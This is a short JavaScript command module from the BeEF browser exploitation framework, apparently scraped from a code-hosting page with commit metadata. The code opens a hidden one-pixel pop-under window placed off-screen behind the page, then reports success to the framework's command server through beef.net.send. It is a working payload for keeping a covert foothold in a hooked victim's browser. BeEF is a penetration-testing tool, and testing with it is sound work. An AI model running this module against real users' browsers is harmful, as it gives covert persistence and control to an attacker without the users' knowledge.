git-svn-id: https://beef.googlecode.com/svn/trunk@908 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
11 lines
444 B
JavaScript
11 lines
444 B
JavaScript
beef.execute(function() {
|
|
|
|
var result="Pop-under window successfully created!";
|
|
|
|
window.open(window.location.protocol + '//' + window.location.host + '/demos/basic.html','popunder','toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=1,height=1,left='+screen.width+',top='+screen.height+'').blur();
|
|
|
|
window.focus();
|
|
|
|
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+escape(result));
|
|
});
|